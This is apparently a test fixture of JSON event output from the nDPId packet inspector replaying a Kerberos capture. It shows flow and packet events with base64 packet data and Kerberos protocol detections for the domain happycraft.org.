00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1549337930217,"pkt":"pB9ywglqAAgCHEeuCABFAADBAFlAAIAGkOysEAjJrBAICMAQAFhuA\/SQrSTVxVAYAQACWAAAqoGWMIGToAMCARKigYsEgYhFQhzXcnmj64Ly0uBtjkMUoTuM+x\/rpAOTUWDkUHAspBDcB8geScaOnqOyTgnIEt9ORSbyaLGh7aDpqWoX8LkoU9AsGNn4U6LRjikWi59PfjQn46P9BY0tn6JOEZn\/IKW+bzyhJYK72MU5dfE\/Y9v1QP4pOcMGsyTXEkOUPDq6y5KpwHUNPs1e"}
00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":1549337930217,"pkt":"AAgCHEeupB9ywglqCABFAACmE1FAAIAGfg+sEAgIrBAIyQBYwBCtJNt5bgP1KVAYAQC1BwAApQG9zo7oa2HyeKU61c2m29Ax+Ioczo4ZbPhC81jR0pDanr7lBKhJeMuGW\/uva7FyAslnHaJSlZ\/JCHVy9T8T0Ut1tj8cqy\/o\/YC+6XwQJV1\/l63dulAmK8KMVnuSbTDSVBQ5iahKxwLlZ8cbK3LMBirQeX8FcESDlzlIPsVQ"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930219,"flow_last_seen":1549337930219,"flow_idle_time":7560000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":1,"thread_ts_msec":1549337930219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00960{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1549337930219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":429,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":429,"pkt_l4_len":395,"thread_ts_msec":1549337930219,"pkt":"pB9ywglqAAgCHEeuCABFAAGfAF1AAIAGkAqsEAjJrBAICMANwANTRo4+sysn9FAYAQASVgAAOJsrJlDNtr7H4lcner+4Ya97utGtvfHqO\/A9pIIBWDCCAVSgAwIBEqKCAUsEggFHE7YBEd08uXxTAz9oATIBnzsu+CIXQ7IKgHphso5XWVrf1UwI0kS3bNe0YDIltyDk2xHWA\/s5Rnf1JAD5LdMYfWfRtly9XMnusGEqHhr+HUrsB70ut1E9AZfE9oDmCRiRKgSi\/yPqeUdMQ3mTdU1fxpZbOqOrcP2UxT7TverwRJibh+asJMQhC1cH82k0XRAktx95xJlXR3QKNE1DR8fsq9gq2Y16fmA9gsztPUDC4IkAL71ItK34puHol45q2g1+vM2umAkKTXGS4uZkIzxH5rv1eNIbWz6GtEw1jeT5kTsqyd\/cgQicx4yHy9VJKmfjweCCyOHHgJ0JONAYKLNrmUspunn\/qiNj30BsQPTsl8DziFoWtJvBGiR7UAPGmzNl3CewZOrjtG26JZPGTaTuBek+GwxKg7cb\/ze4riey9Wnfq0rUqdvf"}
00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1549337930219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":1549337930219,"pkt":"AAgCHEeupB9ywglqCABFAAFEE1VAAIAGfW2sEAgIrBAIycADwA2zKyf0U0aPtVAYAQCiqgAABQAMBxAAAAAcAagAAgAAANAW0BaHIgAABgA0OTE1NQADAAAAAgACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMFcXG6vjdJgxm12++czDYBAAAAAwADAAAAAAAAAAAAAAAAAAAAAAAAAAAACQYAAAAAAAChgaUwgaKgAwoBAaELBgkqhkiC9xIBAgKigY0EgYpvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbZHvDki757uIRa6348vky4CmSXJcuY8x7Y1L3GMPoboaFC4AmaVBuECBYLv9qMZx8MRhhEX3NAubRHjTv4BhutqH0onvuRNc5YNBgbuLmx\/PeM5pC\/bambRC96DP0B9XtGxHF5b6I04IhLGs2Ss="}
00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1549337930219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1549337930219,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAF5AAIAGkKSsEAjJrBAICMANwANTRo+1syspEFAYAP\/w8AAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBEJ\/MyGgG2X9jllu+ZB+MxLzLgKVhkidSZOf9UFj0HoVGhQSTvPAIV6ETXdthgzo7fJnzn1QgLAxGW+unJjrxZzV2yGjHgQcBAQE\/\/\/\/\/\/8AAAAAToOoIEtcH3O\/XLUOvcMURw=="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931189,"flow_last_seen":1549337931189,"flow_idle_time":7560000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"thread_ts_msec":1549337931189,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1549337931189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1549337931189,"pkt":"pB9ywglqAAgCHEeuCABFAAEaAHBAAIAGkHysEAjJrBAICMARAYXGiPwnAgHw6FAYAQD72QAAHIAjHF8ymtjcD1VQuy4UgRChAu\/ekRMgcpsydbeCEgGc8O49XcEm2dIOQUYWz5jyNJ04mLjuLVb5JED7bXFEp0Ouk95kXWAsbhG+yaFiTruRiQNLefpIfBd02fAN9rH6kVBTVFVzTavxG5ZN46Q2CRurERdYtT07E7VAGTF+6yWhKn18+hUxFM5IXiI8jM4osfH687+lmO1gN\/3mr3cymHmPLwvBfLQ9P\/qJ62iSz72gALgVKjnTrFQYtji5UhDqTerpDdd7cbCpV4VyQehZ\/3jzwsKcVZtQElZtM7aiTvqbzIsK7RmP3EZFJoQ\/JIQyyhY="}
00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1549337931190,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337931190,"pkt":"AAgCHEeupB9ywglqCABFAAD6E2FAAIAGfausEAgIrBAIyQGFwBECAfDoxoj9GVAYAQDO8AAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1TTwhyAF9FVLbWTl8wTaD0aGMw9PDC0vNUorciel2CrkeZRTWRInWV74srNnVapF3vxPYDt7dvyfJVk888MzdKOasNrV1ijuwTfVJ0DIXj985iqAQmj9Mcte2ZOXgI6pFvWB0EEgpCluxB9enG"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931198,"flow_last_seen":1549337931198,"flow_idle_time":7560000,"flow_min_l4_payload_len":113,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":113,"midstream":1,"thread_ts_msec":1549337931198,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1549337931198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1549337931198,"pkt":"pB9ywglqAAgCHEeuCABFAACZAHRAAIAGkPmsEAjJrBAICMASAFgkNdEgXsLgdFAYAQB+8gAAMUMT6Lk9nd3l4g7meOnydVZeUkzRDUCNbnZ+O2nc5UtCJOGQV8MBRj2azOMjgxpQ1tcViooap1+TILjpjhURvLMTREvy8WPkAKcvtuPHKbLtQ3Ir7HNN6Ftdy+KwiOrOLvSrSyEtUhWZxA6KOnwca9s="}
00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1549337931199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1549337931199,"pkt":"AAgCHEeupB9ywglqCABFAABsE2VAAIAGfjWsEAgIrBAIyQBYwBJewuYoJDXRkVAYAQBPlQAA7mWAsz4LwR11oOSQ27Ex06YGG2bAP8ttVVXtAwxS755lCHRg4mUkpOjXnBJJ8KdHDkkp7LWBSVTLf+j0wkJ4hFVjx0c="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7560000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1549337931210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"thread_ts_msec":1549337931210,"pkt":"pB9ywglqAAgCHEeuCABFAAXAAHpAAIAGi8ysEAjJrBAICMATAFio5J72SB155lAYAQAvgAAAAAAFlGyCBZAwggWMoQMCAQWiAwIBDKOCBQcwggUDMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjkBvFbBksZRBZsgqvT9rWZWIMz104YLf86+Cksa0ZMsEGJ\/RDcCZOr8kPQRKlwzkm2uQjqkaOemu4sYhWXYr71KrOEs2JUveeWW4HHkLaYXd0a2yOtTAVV1zR76rPVw3Om2DZiy3OdOJiQuRn3tY6sCbzkX\/gKz0r0nI8miItgy4uzP0Z9rEEUiiCUR\/XkOkdTBzoAcDBQBAgQAAohAbDkhBUFBZQ1JBRlQuT1JHoycwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44sbqoEjAQAgESAgERAgEXAgEYAgL\/eQ=="}
00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7560000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}}
02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1549337931211,"pkt":"AAgCHEeupB9ywglqCABFAAXUE2tAAIAGeMesEAgIrBAIyQBYwBNIHXnmqOSkjlAYAQDmlQAAAAAFqG2CBaQwggWgoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIEOGGCBDQwggQwoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6OCA+wwggPooAMCARKhAwIBAaKCA9oEggPWM37115K3Hp8wZkASHyq+pZzCB52w4ZkoKvxkfuUu0LiaHFeH\/YmBkYuC+Y2vHUb50xj2RvlJ0VUIhZ76+RSlQ21W8ccYNaNUXAdabNdF58x1VLmlxuTxbWyuhApe3nart0yE2ggJlqq+SXunnCj4pybyo3D5UqYJsd2CPwW\/UrYMlNJN1gTQgtBaL+rVhNBO6KW9AYxQ1t3V4\/aN5W98Rm9mtqvqy8JlwwSbsqtA+fkgyuLhaFI64sFXeg2okoVY+WpiV8y69YH3VrH9iOYXgjNBApUv8XW3Inwsdd+FJTBLBvDWG4tGHW9DGxqpa+jzaFQyiDi46S1MFPNG5ax\/fXZRFVyIKm5Uvcg+IVoFoTv79M+o2izKZu3xW5GT3jmX5joC1Jz2cBBvfj31IPUawr97kChTt3baVrRO5jtj4Qe\/Yf9D1ea6AnOL3m9lXfbWlkiRMtogdbiLBmz40fY6y7s2fBoNzUM7PPtzjMCZD+mzFnuxbn6SKFsq1jRXr1gfhz99U\/sj4rpgf0fGzuAji6\/CldJydoJ3ZF35EbOHxlT67B0T5Wdz2DSGMxMFnFTU2y41IZZAFsQkozjJDlJyV\/H3UNEgpsuzFWCdn70SJWivzXQmU387\/5qoLQgDt1DzqhRxVq84eAlKWowli8llAVqtdeTmpgPePJrGuN8afpBvekjwt\/1CNWyg0EdZHQFfl1jlAEsgIyCski92E8xu8mvOhuDWTPYemtkOSb2FcxtoxHDyT\/GouX7ARs1ZykSB8j3R9t9ImA7xedyZ34sFfJFGRcLyx6qpTKqFmVZRuxhX4QxBOD\/ubH8xUJ\/p2KhM0jR1yUcK5cyCfymWcxTybrHYNySjaI0gUlhRAiWvZM8bRaCC8Fvoak+VMcqFAYw\/ve5dkR7KuJ\/TxqmhnlpwuoDkayoCpyiqZLALWWLzMuA+erM0osdjgnLPkazewgaOuGK+L14eoN40NcSEI4LVjIf3MizcDep1bu4x++f34uKnDRQCxEnEkfmry2Kt7UmB9dRWUyMnIhre\/LcHyWzVYKmQzK4jbAZGQz3E7SgAtaF8YpuFzK+wN7Al3\/bnw+mNGEv8UnWesnu6eYSeTafPkSExr0eHjyMGHylq1SYGRDikN47BEUJ9DRohxwo4GIbZJ4SlXZm2o1CyYrdjxESgLw7oBxv5ojM77+mqWLxxRYcXrNOO62jI7OC10ISrQjw9VRI73l6ie75xGP23mwgzTkWksp2AmXFXEibjsoWoxN\/dqkJ1paHMQ4D49jni4b2qEd7LE7wiCkMzEEz1wgpM028xFWhhGKaCASowggEmoAMCARKiggEdBIIBGXjHjK5feQ4HY+O2QW1CcrS7y98xjbx4G5\/F1UdYW0nRFrJ1ea7DBhGVKjGhvpNRa\/suoiAGgMaTxIusGGUQaAV3QBkZHI2P7w3S90dRv87TwzBiyLZFov6Iyju+rGIOEBeNij1u4+ieA37sl1WxkkeY5PDSqYQ0xi5dzSQDh1ZKJZF1swmboJUdCNAO5zs9II914vVd0a+gpHqPPfi\/aa\/2ENYesIfYc445XBAksieN4OCiUuXDZetEyUARPhuFnigdmrFcLiKa7lrUb+XOxw\/TpGzrNeFBj3QXNS06SOOdTL3pwlP77\/SR+78shwDam4sOlgv2UEV2H31TfNEKJs\/OC4Ks1WD8+3srLETa3NVngdje5im6AaSi"}
00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"flow_min_l4_payload_len":1064,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":1064,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"thread_ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAARQAIFAAIAGjTWsEAjJrBAICMAVAFjnnRKZiyMmn1AYAQD\/uwAADkhBUFBZQ1JBRlQuT1JHoicwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQGiggPaBIID1jN+9deStx6fMGZAEh8qvqWcwgedsOGZKCr8ZH7lLtC4mhxXh\/2JgZGLgvmNrx1G+dMY9kb5SdFVCIWe+vkUpUNtVvHHGDWjVFwHWmzXRefMdVS5pcbk8W1sroQKXt52q7dMhNoICZaqvkl7p5wo+Kcm8qNw+VKmCbHdgj8Fv1K2DJTSTdYE0ILQWi\/q1YTQTuilvQGMUNbd1eP2jeVvfEZvZrar6svCZcMEm7KrQPn5IMri4WhSOuLBV3oNqJKFWPlqYlfMuvWB91ax\/YjmF4IzQQKVL\/F1tyJ8LHXfhSUwSwbw1huLRh1vQxsaqWvo82hUMog4uOktTBTzRuWsf312URVciCpuVL3IPiFaBaE7+\/TPqNosymbt8VuRk945l+Y6AtSc9nAQb3499SD1GsK\/e5AoU7d22la0TuY7Y+EHv2H\/Q9XmugJzi95vZV321pZIkTLaIHW4iwZs+NH2Osu7NnwaDc1DOzz7c4zAmQ\/psxZ7sW5+kihbKtY0V69YH4c\/fVP7I+K6YH9Hxs7gI4uvwpXScnaCd2Rd+RGzh8ZU+uwdE+Vnc9g0hjMTBZxU1NsuNSGWQBbEJKM4yQ5Sclfx91DRIKbLsxVgnZ+9EiVor810JlN\/O\/+aqC0IA7dQ86oUcVavOHgJSlqMJYvJZQFarXXk5qYD3jyaxrjfGn6Qb3pI8Lf9QjVsoNBHWR0BX5dY5QBLICMgrJIvdhPMbvJrzobg1kz2HprZDkm9hXMbaMRw8k\/xqLl+wEbNWcpEgfI90fbfSJgO8Xncmd+LBXyRRkXC8seqqUyqhZlWUbsYV+EMQTg\/7mx\/MVCf6dioTNI0dclHCuXMgn8plnMU8m6x2Dcko2iNIFJYUQIlr2TPG0WggvBb6GpPlTHKhQGMP73uXZEeyrif08apoZ5acLqA5GsqAqcoqmSwC1li8zLgPnqzNKLHY4Jyz5Gs3sIGjrhivi9eHqDeNDXEhCOC1YyH9zIs3A3qdW7uMfvn9+Lipw0UAsRJxJH5q8tire1JgfXUVlMjJyIa3vy3B8ls1WCpkMyuI2wGRkM9xO0oALWhfGKbhcyvsDewJd\/258PpjRhL\/FJ1nrJ7unmEnk2nz5EhMa9Hh48jBh8patUmBkQ4pDeOwRFCfQ0aIccKOBiG2SeEpV2ZtqNQsmK3Y8REoC8O6Acb+aIzO+\/pqli8cUWHF6zTjutoyOzgtdCEq0I8PVUSO95eonu+cRj9t5sIM05FpLKdgJlxVxIm47KFqMTf3apCdaWhzEOA+PY54uG9qhHeyxO8IgpDMxBM9cIKTNNvMRVoYRg="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00784{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAAEaAINAAIAGkGmsEAjJrBAICMAUAYWVZlyUeqXAF1AYAQAMZQAAADzwgZ4odBCJHRYlGGakwQrZbcEXWu9XXnYRAfBS9UWuXk5Gs8yUHN3o80HZG8YpVlAE6+3ZtDtC+pUsrywDAW4RiWhUhsRgT1sEZ7Vtb++mdY4XtnskLm1\/a8GZzwfpptF0EbEM2x6OOlhhC6IhVJD1Y8p9M\/8ToLfUByDVk8u4C3VF8fyeQ0nd00U5YKsyBV8n8IUXdemUN+fgHev0R3Z+H9FwOZZ3xgduPU1Vapfbai\/N6Y9ZMkNd8RzvF1IldwQMemLuz0F0TTbyd784T8orT0ooc+nzAjFSSfg1FeelCx\/Q2\/iHKtSIZWhWBK\/UpxM="}
00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1549337931213,"pkt":"AAgCHEeupB9ywglqCABFAACwE3FAAIAGfeWsEAgIrBAIyQBYwBWLIyaf550WwVAYAQCWAgAAAAAAhH6BgTB\/oAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OVqlBQIDDJwypgMCAQ2pEBsOSEFQUFlDUkFGVC5PUkeqJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6wZBBcwFaEDAgEDog4EDLsAAMAAAAAAAwAAAA=="}
00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337931213,"pkt":"AAgCHEeupB9ywglqCABFAAD6E3RAAIAGfZisEAgIrBAIyQGFwBR6pcAXlWZdhlAYAQAZvwAAMIQAAADMAgEHYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG3yZsLFskNz2Tj8maOz7vLNMVSC3wBerc1xRFPj0GLDPGT9QlZRJav62bndhsIjLkgXNAdSqCa2GR8Luxe5TgJHZoIn44Is8Ku3wpqAc9pR3m8qLfoA6VkyZzzulSM2YJ4KniKJ4c7+rl